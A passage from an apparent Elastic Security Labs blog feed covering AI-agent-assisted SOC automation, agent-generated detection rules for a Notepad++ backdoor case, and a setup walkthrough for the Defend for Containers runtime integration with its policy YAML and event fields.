<li><strong>Summarization and Enrichment:</strong> The agent can be used to summarize the attack, identify important artifacts, and conduct automated third-party enrichments (like checking VirusTotal). This tailored experience provides a full assessment, including an attack chain, threat intelligence information, related cases, entity risk scoring, and a full investigation guide.</li>
<li><strong>Case Management:</strong> The agent can be instructed to take immediate action, such as generating a security case and notifying the team in Slack, all through simple conversational commands that execute pre-configured workflows.</li>
</ul>
<h3>Automated Response and Threat Hunting</h3>
<p>The true power of the Agentic SOC is realized through action and automation that goes beyond simple conversation:</p>
<ul>
<li>
<p><strong>Workflows and SOAR-like Automation:</strong> Agents can reference and execute <strong>Workflows</strong>, Elastic's SOAR-like automation tool. These workflows allow analysts to take immediate, complex actions. For example, a command like &quot;Please create a case for this attack, and notify my team in Slack&quot; triggers multiple, pre-defined steps. Further critical response actions, such as <strong>isolating a host</strong>, can be executed with a single workflow action while the investigation continues.</p>
</li>
<li>
<p><strong>AI-Assisted Threat Hunting:</strong> AI assists threat hunters by leveraging <strong>Entity Analytics</strong> and pre-built skills. The agent can be asked to find high-risk hosts and users to begin hunting, and then automatically generate specific ESQL queries (e.g., &quot;Please tell me the most uncommon processes executed for each host&quot;) to uncover unusual or malicious activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image1.png" alt="" /></p>
</li>
</ul>
<h3>The Mandate of Automation</h3>
<p>For maximum effectiveness, all these steps,from alert triage and enrichment to case creation and host isolation,can be configured to run <strong>automatically</strong> as an Agentic Alert Triage workflow. This allows the system to solve problems as soon as they are discovered, setting up the human analyst in the loop with a consolidated case and all the necessary findings in a single pane of glass.</p>
<p>This approach delivers substantial <strong>efficiency improvements</strong>, making speed the single most important factor in a modern, Agentic SOC.</p>
<p>Elastic’s Agentic Security Operations Platform</p>
<p>Whether you use our UI, our agents, or your own, Elastic Security provides a strong open foundation for modern security operations. best-in-class data architecture, search, workflows, analytics, detection engineering content, and automation.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/streamlining-the-security-analyst-experience.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Supercharge Your SOC]]></title>
            <link>https://www.elastic.co/security-labs/supercharge-your-soc</link>
            <guid>supercharge-your-soc</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Detection Engineering in the Era of AI Agents - The New Frontier.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>The landscape of cybersecurity is evolving, and the role of the Detection Engineer (DE) is more critical and demanding than ever. Traditionally, this role involves a comprehensive, end-to-end workflow: from threat modeling and telemetry tuning to writing, testing, and maintaining performance-optimized detection rules to flag malicious behavior.</p>
<p><strong>Elastic Security is purpose-built to streamline this entire workflow, empowering DEs - and anyone involved in security operations - to build, manage, and optimize detection rules at scale. This allows security teams to concentrate their efforts on the most critical task: protecting the organization.</strong></p>
<p>The rise of generative AI and, more specifically, advanced AI <strong>coding agents</strong> like Claude and Cursor, is fundamentally changing and supercharging this workflow.  These tools are no longer just for general software development; they are becoming expert partners for the Security Operations Center (SOC). By integrating the power of conversational AI, these agents can take high-level security requirements and instantly translate them into validated, workable detection logic.</p>
<h1>From Generalist to Elastic Expert: Agent Skills</h1>
<p>Elastic Security is embracing this shift not only by having native AI capabilities built-into our agentic security operations platform , but also by <a href="https://www.elastic.co/search-labs/blog/agent-skills-elastic">open-sourcing <strong>agent skills for 3rd party agentic IDEs</strong></a>, a native platform experience for the entire Elastic ecosystem (Security, Observability, etc.). By loading these skills into any agent runtime, your AI assistant moves from being a generalist to an on-demand expert in Elastic’s tooling. You can then ask your agent to triage alerts or, in this context, expertly create and tune detection rules</p>
<h1>A Use Case Walkthrough: The Notepad++ Attack</h1>
<p>To illustrate the agent’s power, let’s look at a real-world supply chain-based attack involving a backdoor targeting the Notepad++ infrastructure described in Elastic Security Lab’s blog, <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">“Speeding APT Attack”</a><strong>.</strong></p>
<h2>Instant Conditional Rules</h2>
<p>A detection engineer’s first step is often to create conditional rules based on known Indicators of Compromise (IOCs). To begin, we can instruct the agent to investigate data within Elastic Security, as evidence of the attack was present in our cluster.</p>
<pre><code>&quot;Can you help me create a detection rule that will detect malicious activity similar
 to what I'm seeing in my Elastic Security deployment involving notepad++.exe 
 and BluetoothService.exe?&quot;
</code></pre>
<p>The agent immediately went to work:</p>
<ul>
<li>It rapidly found process lineage and documented attack details.</li>
<li>It extracted key IOCs and found the corresponding MITRE ATT&amp;CK™ mappings.</li>
<li>It generated two foundational rules: one for a suspicious child process spawned by <strong>Notepad++</strong>, and one focusing on the masqueraded executable.</li>
<li>Crucially, the rules were immediately tested against threat emulation data, confirming multiple successful hits.</li>
</ul>
<p>Each step is happening quickly, and the built-in validation significantly accelerates the 'test and tune' phase.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image2.png" alt="Agent progress initiating creation of conditional detection rules (Claude Code shown)" title="Agent progress initiating creation of conditional detection rules (Claude Code shown)" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image7.png" alt="Agent report after creating two conditional detection rules (Claude Code shown)" title="Agent report after creating two conditional detection rules (Claude Code shown)" /></p>
<p>Let’s take a look at the agent-created rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image3.png" alt="Agent-created rule details appear seamlessly in Elastic Security" title="Agent-created rule details appear seamlessly in Elastic Security" /></p>
<h2>Diving into Advanced ESQL Aggregation</h2>
<p>Conditional logic is great, but modern threats require more behavioral and entity-focused detections. Using Elastic’s powerful piping language, <a href="https://www.elastic.co/docs/reference/query-languages/esql">ES|QL</a> (Elastic Search Query Language), the agent was challenged to create an <strong>aggregation-based rule</strong> that looks for generic, suspicious characteristics across tasks, aggregates them, and assigns a dynamic risk score to host and user entities.</p>
<p>The agent delivered, creating an advanced query that looks for suspicious executables, negates benign directories, and assesses scores based on the activity's risk level. This demonstrates the agent's ability to create sophisticated detections unique to Elastic's capabilities, moving beyond simple lookups to complex entity analytics.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image4.png" alt="Agent creating aggregation-based detection rule (Claude Code shown)" title="Agent creating aggregation-based detection rule (Claude Code shown)" /></p>
<p>Here’s the rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image1.png" alt="More complex aggregation-based rule appears properly in Elastic Security" title="More complex aggregation-based rule appears properly in Elastic Security" /></p>
<h2>Sequential Detections with EQL and Suppression</h2>
<p>To detect multi-stage attacks, a <strong>sequential rule</strong> is essential—if Event A, then Event B, then Event C, then alert. Using the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/eql">Event Query Language (EQL)</a>, the agent crafted a perfect three-stage sequence for the attack:</p>
<ol>
<li>Unsigned dropper activity.</li>
<li>Service masquerade (implant deployed).</li>
<li>Final execution for persistence.</li>
</ol>
<p>To make the rule more reliable and reduce noise, suppression logic was then added, focusing on limiting alerts per unique Host ID. This quick iteration shows how an agent can help a detection engineer rapidly move from a basic detection to a highly robust, multi-stage rule.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image6.png" alt="Agent creating advanced sequence-based detection rule (Claude Code shown)" title="Agent creating advanced sequence-based detection rule (Claude Code shown)" /></p>
<h2>The LLM-Augmented Query: Summaries in the Alert</h2>
<p>The ultimate demonstration of the new agentic workflow is using <a href="https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion">Elastic’s <strong>ESQL COMPLETION syntax</strong></a>. This feature allows an inference model to be referenced <em>directly within the query</em>.</p>
<p>The prompt asked the agent to:</p>
<pre><code>Based off this recent elastic blog,
 https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion, 
 create a rule that incorporates a COMPLETION command with my  default inference 
 model that will summarize findings from attack into one &quot;esql.summary&quot;
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image5.png" alt="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" title="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" /></p>
<p>The result? The generated rule didn't just fire an alert; it natively included an <strong>ES|QL summary row</strong> in the alert itself:</p>
<blockquote>
<p>This telemetry shows a masquerading technique where a process named &quot;BluetoothService.exe&quot; is executing from a user's AppData directory with a PE original name of &quot;BDSubWiz.exe&quot; (a legitimate file mismatch), running as SYSTEM with service-like characteristics including spawning from services.exe, indicating persistence establishment (MITRE ATT&amp;CK T1036.004 Masquerading and T1543 Service Persistence). The executable's location in a user directory, combined with SYSTEM-level execution, service persistence indicators, and the name/PE mismatch across multiple events, suggests Defense Evasion and Persistence stages. This represents high severity due to successful SYSTEM-level persistence with active defense evasion through masquerading.</p>
</blockquote>
<p>This cuts triage time dramatically, as analysts no longer need to pivot to a separate runbook to understand the context and severity of the alert.</p>
<h1>The Agentic SOC is Here</h1>
<p>The collaboration between AI agents and the Elastic Security solution provides a glimpse into Elastic’s <a href="https://www.elastic.co/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc"><strong>Agentic SOC</strong></a> of the future. It’s a world where detection engineers can have a conversation, define their intent, and instantly generate, test, and deploy highly sophisticated, context-rich detection rules. This is not about replacing the human expert, but about augmenting their knowledge and accelerating their workflow, allowing them to focus on high-value threat intelligence and modeling.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/supercharge-your-soc.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - Getting Started with Defend for Containers (D4C)]]></title>
            <link>https://www.elastic.co/security-labs/getting-started-with-defend-for-containers</link>
            <guid>getting-started-with-defend-for-containers</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This technical resource provides a comprehensive walkthrough of Elastic’s Defend for Containers (D4C) integration, covering Kubernetes-based deployment, the analysis of BPF-enriched runtime telemetry, and the practical application of policy-driven security controls to monitor and alert on activities within containerized Linux environments.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Linux systems remain a critical foundation for modern infrastructure, particularly in cloud-native environments where containers and orchestration platforms are the norm. As workloads move from long-lived hosts to ephemeral containers, attacker tradecraft shifts as well. Activity that once left persistent artifacts on disk is increasingly confined to short-lived, runtime behavior that can be difficult to capture using traditional log sources.</p>
<p>Detection engineering in these environments, therefore, depends heavily on runtime visibility. Understanding how processes execute inside containers, how files are accessed, and how workloads interact with the host becomes more important than relying on static indicators or post-incident artifacts.</p>
<p>Elastic provides several Linux-focused telemetry sources to support this type of detection work. In <a href="https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd">earlier posts in this series</a>, we focused on host-level visibility using Auditd and Auditd Manager, showing how low-level system events can be translated into high-fidelity detections. In this post, the focus shifts to Elastic’s Defend for Containers: a runtime security integration built specifically for containerized Linux workloads.</p>
<p>The goal of this article is not to document every Defend for Containers feature, but to provide a practical starting point for detection engineers: what data the integration produces and how to reason about that data. In the next part, we will look into how it can be applied to realistic container attack scenarios.</p>
<h2>Streamlined visibility with Defend for Containers</h2>
<p>We are excited to announce the arrival of Defend for Containers in the 9.3.0 release. This integration brings a streamlined approach to container security, offering a strong foundation for visibility in cloud-native infrastructures. Users can leverage a suite of detection rules tailored to defend against modern Kubernetes threats and container-specific vulnerabilities. The arrival of Defend for Containers is accompanied by <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/cloud_defend">a container-specific detection ruleset</a>, designed around realistic container and Kubernetes threat models.</p>
<p>At the time of writing, the Defend for Containers ruleset provides baseline coverage for common container attack techniques, including reconnaissance activity, credential access attempts, kubelet attacks, service account token abuse, interactive process execution, file creation and modification, interpreter abuse, encoded payload execution, tooling installation, tunneling behavior, and multiple privilege escalation vectors. Importantly, all existing container- and Kubernetes-specific detection rules <a href="https://github.com/elastic/detection-rules/pull/5685">have been made compatible with Defend for Containers</a>, allowing previously host-centric logic to operate directly on container runtime telemetry.</p>
<p>This makes Defend for Containers a practical and immediately usable data source for Linux detection engineers focused on behavior-driven runtime detection. The remainder of this post focuses on how that telemetry looks in practice and how it can be applied to real-world container attack scenarios.</p>
<h2>Introduction to Defend for Containers</h2>
<p><a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">Defend for Containers</a> is a runtime security integration that provides visibility into Linux containers as they execute. Instead of relying on static image scanning or post-execution logs, it focuses on observing container behavior in real time.</p>
<p>At a high level, Defend for Containers captures security-relevant runtime events from running containers, such as process execution and file access. These events are enriched with container and orchestration context and shipped into Elasticsearch, where they can be analyzed and used as input for detection rules.</p>
<p>From a detection engineering perspective, Defend for Containers sits at the intersection of traditional Linux behavior and the container context. Processes, syscalls, and file activity remain core signals, but they are now scoped to containers, namespaces, and workloads that may only exist briefly.</p>
<p>Defend for Containers is deployed as part of the Elastic Agent and integrates directly with Elastic Security. Once enabled, it provides a dedicated stream of container runtime events that can be queried using KQL or ES|QL, or consumed directly by detection analytics. This allows detection engineers to apply familiar analysis techniques while accounting for the operational realities of cloud-native workloads.</p>
<p>In the sections that follow, we will examine Defend for Containers events in more detail and walk through several container attack scenarios to illustrate how this data can be used in practice.</p>
<h3>Defend for Containers setup</h3>
<p>Before you can take advantage of Defend for Containers' runtime visibility and analytics, you need to deploy the integration and configure a policy that defines which events to observe and what actions to take when matching activity is encountered. More information about the integration and its setup can be found <a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">here</a>. At a high level, this setup consists of:</p>
<ol>
<li>Deploying the Defend for Containers integration via Elastic Agent in your Kubernetes environment.</li>
<li>Configuring or customizing the Defend for Containers policy, which consists of selectors that define which operations to match and responses that define what actions to take.</li>
<li>Validating and refining the policy based on observed workload behavior.</li>
</ol>
<h3>Deployment methods</h3>
<p>Defend for Containers is delivered as an Elastic Agent integration and relies on Elastic Agent to collect and forward container runtime telemetry into your Elastic Stack. For Kubernetes workloads, you install the integration via the Elastic Security UI and then enroll agents on your cluster nodes.</p>
<p>The basic deployment flow is:</p>
<p>In the Elastic Security UI, navigate to <a href="https://www.elastic.co/docs/reference/fleet">Fleet</a> and create a new Agent Policy (or add the integration to an existing one). Once the Agent Policy is created, we can add the “Defend for Containers” integration to the policy.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image1.png" alt="Figure 1: Add the integration to the agent policy view" title="Figure 1: Add the integration to the agent policy view" /></p>
<p>Give the integration a name and optionally adjust the default selectors and responses (we will look into the available options further down in this publication). Once “Add integration” is selected, a new Agent Policy with the correct integration should be available.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image5.png" alt="Figure 2: Agent policy integrations overview" title="Figure 2: Agent policy integrations overview" /></p>
<p>For this demonstration, we will leverage the Kubernetes deployment method. To deploy this policy to a workload, we can navigate to Actions → Add agent → Kubernetes. Here, we see instructions for copying or downloading the Kubernetes manifest.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image19.png" alt="Figure 3: Defend for Containers Kubernetes manifest overview" title="Figure 3: Defend for Containers Kubernetes manifest overview" /></p>
<p>An important note to be aware of is: “<em>Note that the following manifest contains resource limits that may not be appropriate for a production environment. Review our guide on <a href="https://www.elastic.co/docs/reference/fleet/scaling-on-kubernetes#_specifying_resources_and_limits_in_agent_manifests">Scaling Elastic Agent on Kubernetes</a> before deploying this manifest.</em>”</p>
<p>You will need to include the following <code>capabilities</code> under <code>securityContext</code> in your Kubernetes YAML for the service to work:</p>
<pre><code class="language-yaml">securityContext:
    runAsUser: 0
    capabilities:
      add:
        - BPF ## Enables both BPF &amp; eBPF
        - PERFMON
        - SYS_RESOURCE
</code></pre>
<p>After copying or downloading the provided <code>elastic-agent-managed-kubernetes.yml</code> manifest, you can edit the manifest as needed, and apply the manifest with:</p>
<pre><code class="language-bash">kubectl apply -f elastic-agent-managed-kubernetes.yml
</code></pre>
<p>As also mentioned in the manifest, review the guide “<a href="https://www.elastic.co/docs/reference/fleet/running-on-kubernetes-managed-by-fleet">Run Elastic Agent on Kubernetes managed by Fleet</a>” for more deployment information.</p>
<p>Wait for the Elastic Agent pods to schedule and for data to begin flowing into Elasticsearch.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image16.png" alt="Figure 4: Defend for Containers integration input overview" title="Figure 4: Defend for Containers integration input overview" /></p>
<p>Once deployed, Elastic Agent will establish a connection to Fleet, enroll under the selected policy, and begin emitting Defend for Containers telemetry that Elastic Security can consume.</p>
<p>In the next section, we will take a look at the integration configuration options and explore which features are available to use.</p>
<h3>Defend for Containers policies</h3>
<p>At the heart of Defend for Containers' configuration is the policy. Policies determine what activity to observe and how to respond when matching events occur. Policies are composed of two fundamental building blocks:</p>
<ul>
<li><strong>Selectors:</strong> define which events are of interest by specifying operations and conditions;</li>
<li><strong>Responses:</strong> define what actions to take when a selector’s conditions are met.</li>
</ul>
<p>Defend for Containers policies can be edited before deployment or modified post-deployment via the Elastic Security UI’s policy editor.</p>
<h4>Policy structure</h4>
<p>Each policy must contain at least one selector and at least one response. A typical selector specifies one or more operations (such as process events or file activities) and uses conditions (like container image name, namespace, or pod label) to narrow the scope. Responses reference selectors and indicate what action to take when events match.</p>
<p>The default Defend for Containers policy includes two selector-response pairs: “Threat Detection” and “Drift Detection &amp; Prevention”.</p>
<p><strong>Threat detection:</strong> A <code>selector</code> named <code>allProcesses</code> matches all <code>fork</code> and <code>exec</code> events from containers.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image13.png" alt="Figure 5: Defend for Containers allProcesses selector" title="Figure 5: Defend for Containers allProcesses selector" /></p>
<p>And the associated <code>response</code> has the action set to <code>Log</code>, ensuring that events are ingested and can be analyzed.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image11.png" alt="Figure 6: Defend for Containers allProcesses log response" title="Figure 6: Defend for Containers allProcesses `log` response" /></p>
<p><strong>Drift detection &amp; prevention:</strong> A selector named <code>executableChanges</code> matches <code>createExecutable</code> and <code>modifyExecutable</code> operations.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image7.png" alt="Figure 7: Defend for Containers executableChanges selector" title="Figure 7: Defend for Containers executableChanges selector" /></p>
<p>And the response is configured to create alerts (and can be modified to block those operations).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image18.png" alt="Figure 8: Defend for Containers executableChanges alert response" title="Figure 8: Defend for Containers executableChanges `alert` response" /></p>
<p>These can be modified via the UI, but under the hood, these policies are simple YAML configuration files that can be easily modified and used in any CI|CD flows:</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: allProcesses
      operation:
        - fork
        - exec
  responses:
    - match:
        - allProcesses
      actions:
        - log
file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - alert
</code></pre>
<p>Next, we will take a look at some example selectors and responses and discuss the options you have for setting up the integration to your liking.</p>
<p><strong>Example selector snippet</strong></p>
<p>Selectors allow fine-grained matching using conditions on fields such as:</p>
<ul>
<li><code>containerImageFullName</code>: full image names like <code>docker.io/nginx</code>;</li>
<li><code>containerImageName</code>: partial image names;</li>
<li><code>containerImageTag</code>: specific tags like latest;</li>
<li><code>kubernetesClusterId</code>: Kubernetes cluster IDs;</li>
<li><code>kubernetesClusterName</code>: Kubernetes cluster names;</li>
<li><code>kubernetesNamespace</code>: namespaces where the workload runs;</li>
<li><code>kubernetesPodName</code>: pod names, with support for trailing wildcards;</li>
<li><code>kubernetesPodLabel</code>: label key/value pairs, with wildcard support.</li>
</ul>
<pre><code class="language-yaml">selectors:
  - name: nodeExports
    file:
      operations:
        - createExecutable
        - modifyExecutable
      containerImageName:
        - &quot;nginx&quot;
      kubernetesNamespace:
        - &quot;prod-*&quot;
</code></pre>
<p>In this example, the selector named <code>nodeExports</code> matches file events that create or modify executables within containers whose image names contain “nginx” and whose Kubernetes namespace begins with <code>“prod-”</code>.</p>
<p><strong>Example response snippet</strong></p>
<p>Responses determine what happens when selector conditions are met. Common actions include:</p>
<ul>
<li><code>log</code>: send the event as telemetry for analysis;</li>
<li><code>alert</code>: create an alert in Elastic Security;</li>
<li><code>block</code>: prevent the operation (for supported types).</li>
</ul>
<pre><code class="language-yaml">responses:
  - name: alertAndBlockNodeExports
    matchSelectors:
      - nodeExports
    actions:
      - alert
      - block
</code></pre>
<p>Here, the response named <code>alertAndBlockNodeExports</code> references the previously defined nodeExports selector and will both generate an alert and block the operation.</p>
<h4>Wildcards and matching</h4>
<p>Selectors in Defend for Containers support trailing wildcards in string-based conditions (such as pod names or image tags). This allows broad matching without enumerating every possible value. For example, a pod selector of <code>backend-*</code> will match all pods whose names begin with <code>backend-</code>, while a label condition such as <code>role:api*</code> matches label values that start with <code>api</code>.</p>
<p>This wildcarding is essential in dynamic environments where workloads scale and shift rapidly.</p>
<p>In addition to simple string matching, Defend for Containers selectors also support <strong>path-based wildcard semantics</strong> when matching file paths. Consider the following selector example:</p>
<pre><code class="language-yaml">- name:
  targetFilePath:
    - /usr/bin/echo
    - /usr/sbin/*
    - /usr/local/**
</code></pre>
<p>In this example:</p>
<ul>
<li><code>/usr/bin/echo</code> matches only the <code>echo</code> binary at that exact path.</li>
<li><code>/usr/sbin/*</code> matches everything that is a direct child of <code>/usr/sbin</code>.</li>
<li><code>/usr/local/**</code> matches everything recursively under <code>/usr/local</code>, including paths such as <code>/usr/local/bin/something</code>.</li>
</ul>
<p>These distinctions make it possible to precisely scope file-based selectors, balancing coverage and noise. In practice, they allow detection engineers to target specific binaries, entire directories, or deep directory trees, depending on the use case, without resorting to overly permissive rules.</p>
<h4>Tying it all together</h4>
<p>Up to this point, we have looked at Defend for Containers selectors, wildcard semantics, event types, and how they surface attacker behavior at runtime. The final step is to understand how these pieces come together within a policy to express real detection logic.</p>
<p>Consider the following policy fragment:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: binDirExeMods
      operation:
        - createExecutable
        - modifyExecutable
      targetFilePath:
        - /usr/bin/**
    - name: etcFileChanges
      operation:
        - createFile
        - modifyFile
        - deleteFile
      targetFilePath:
        - /etc/**
    - name: nginx
      containerImageName:
        - nginx

  responses:
    - match:
        - binDirExeMods
        - etcFileChanges
      exclude:
        - nginx
      actions:
        - alert
        - block
</code></pre>
<p>This policy defines three selectors. Two selectors (<code>binDirExeMods</code> and <code>etcFileChanges</code>) describe file system activity of interest, while the third selector (<code>nginx</code>) describes a container context to exclude.</p>
<p>The response section ties these selectors together. The selectors listed under <code>match</code> are logically <code>OR</code>’d, meaning that <em>either</em> condition is sufficient to trigger the response. The selector listed under <code>exclude</code> acts as a logical <code>NOT</code>, removing matching events when the container image is <code>nginx</code>.</p>
<p>Read in plain language, the policy expresses the following logic:</p>
<p><em>If an executable is created or modified anywhere under <code>/usr/bin</code>, <strong>or</strong> a file is created, modified, or deleted under <code>/etc</code>,  <strong>and</strong> the activity does not originate from an <code>nginx</code> container, then generate an alert and block the action.</em></p>
<p>In Boolean form, this can be expressed as:</p>
<pre><code class="language-text">IF (binDirExeMods OR etcFileChanges) AND NOT nginx
→ alert + block
</code></pre>
<p>This is where Defend for Containers policies become powerful. Rather than writing complex detection logic in a query language, selectors let you decompose behavior into small, reusable building blocks and then combine them declaratively. By mixing path-based selectors, operation types, container context, and exclusions, you can express nuanced detection logic that remains readable and maintainable.</p>
<p>In practice, this model allows detection engineers to translate threat hypotheses directly into policy logic: <em>what</em> behavior matters, <em>where</em> it occurs, <em>in which workloads</em>, and <em>what should happen</em> when it does.</p>
<h4>Policy validation and refinement</h4>
<p>Once a policy is deployed, it is critical to validate it against real workload behavior before enabling aggressive responses such as blocking. Policies that are too restrictive can disrupt normal container operations; policies that are too permissive may let unwanted activity go unnoticed.</p>
<p>A recommended workflow is:</p>
<ol>
<li>Deploy the default policy in monitoring mode (e.g., with selectors logging events).</li>
<li>Observe the events that appear in Elasticsearch to understand normal workload patterns.</li>
<li>Incrementally tighten selectors and responses, moving from <em>log only</em> → <em>alert</em> → <em>block</em>, testing at each stage.</li>
<li>Use a staging or test cluster to validate blocking behaviors before applying them in production.</li>
</ol>
<h3>Defend for Containers Beta limitations</h3>
<p>As of writing, Defend for Containers is available as a Beta integration, and its current capabilities and platform support reflect that status.</p>
<p>Defend for Containers formally supports Amazon EKS and Google GKE. While the integration can be deployed on Azure AKS, this configuration is not officially supported. In particular, AKS deployments currently lack file event telemetry, which limits detection coverage for file-based attack techniques in those environments.</p>
<p>The current Beta also does not capture network events. As a result, detections related to outbound connections, lateral network movement, or data exfiltration must rely on complementary data sources, such as the <a href="https://www.elastic.co/docs/reference/integrations/network_traffic">Network Packet Capture integration</a> or <a href="https://www.elastic.co/beats/packetbeat">Packetbeat</a> integrations, rather than on Defend for Containers telemetry alone.</p>
<p>For file activity, Defend for Containers intentionally logs file open events only when opened with write intent. This design choice reduces noise and focuses on behavior that modifies the system state. However, it also means that read-only access to sensitive files, such as secret discovery, configuration scraping, or failed access attempts, is not currently observable.</p>
<p>This limitation impacts detection use cases such as:</p>
<ul>
<li>Searching and reading Kubernetes service account tokens,</li>
<li>Scanning for <code>.env</code> files or credential material.</li>
</ul>
<p>These are areas where future Defend for Containers iterations may provide more granular telemetry to support advanced detection engineering use cases.</p>
<h3>Enabling the Defend for Containers pre-built detection rules</h3>
<p>Defend for Containers ships with a set of pre-built detection rules that provide baseline coverage for common container attack techniques. Once the integration is enabled, these rules can be activated directly from Elastic Security without additional configuration.</p>
<p>Enabling the pre-built rules is recommended as a starting point, as they are designed to align with Defend for Containers' runtime telemetry and cover execution, file modification, persistence, and post-compromise behavior inside containers. From there, the rules can be extended or refined to match environment-specific workloads and threat models.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image17.png" alt="Figure 9: Defend for Containers pre-built detection rule installation based on tag" title="Figure 9: Defend for Containers pre-built detection rule installation based on tag" /></p>
<p>By filtering for “Data Source: Elastic Defend for Containers”, you can find all rules associated with this integration.</p>
<p><strong>Note:</strong> if you do not see any rules pop up, make sure your stack is running version 9.3.0, as these rules are deployed only on 9.3.0+.</p>
<p>With all important Beta limitations mapped, the integration deployed, the pre-built detection rules installed and enabled, and a working policy in place, the next step is to explore the event semantics Defend for Containers produces, including fields commonly used in detection logic, performance considerations, and how these events differ from Elastic Defend events.</p>
<h2>Analyzing Defend for Containers events</h2>
<p>Now that Defend for Containers is deployed and policies are in place, the next step is understanding the events it generates. Similar to working with Elastic Defend or Auditd Manager, Defend for Containers telemetry becomes far more valuable once you develop a mental model of how events are structured and which fields are most relevant for detection engineering.</p>
<p>Defend for Containers produces multiple event types, most notably process events and file events, each enriched with container, host, and orchestration context. While the underlying signals remain rooted in Linux behavior, the additional Kubernetes and container metadata enable you to reason about activity in ways not possible with host-only telemetry.</p>
<p>The following sections walk through the most important field groups and event types, using real Defend for Containers events as reference points.</p>
<h3>Common fields</h3>
<p>Before diving into specific event categories, it is useful to understand the fields that consistently appear across Defend for Containers telemetry. These fields provide the contextual glue that ties individual runtime actions back to policies, selectors, and the underlying execution points inside the kernel.</p>
<p>While process and file events differ in their details, the fields described below are present across Defend for Containers data streams and are often the first place to look when validating detections or troubleshooting policy behavior.</p>
<h4>Defend for Containers-specific context</h4>
<p>Defend for Containers adds several fields specific to how events are collected and policies are applied.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image10.png" alt="Figure 10: Defend for Containers’ important cloud_defend.* fields overview" title="Figure 10: Defend for Containers’ important `cloud_defend.*` fields overview" /></p>
<p>The <code>cloud_defend.hook_point</code> field indicates where in the kernel the event was captured. In the example shown, values such as <code>tracepoint__sched_process_fork</code> and <code>tracepoint__sched_process_exec</code> reveal that the event was generated from kernel tracepoints associated with process creation and execution.</p>
<p>The <code>cloud_defend.matched_selectors</code> field shows which selectors in the active policy matched the event. In the example, the value <code>allProcesses</code> indicates that this event matched a broad selector that captures all process activity. When tuning policies or investigating alerts, this field is essential for understanding <em>why</em> an event was captured.</p>
<p>The <code>cloud_defend.package_policy_id</code> and <code>cloud_defend.package_policy_revision</code> fields tie the event back to a specific Elastic Agent policy and its revision. This makes it possible to correlate events with configuration changes over time and to verify which version of a policy was active when the event occurred.</p>
<h4>Event metadata</h4>
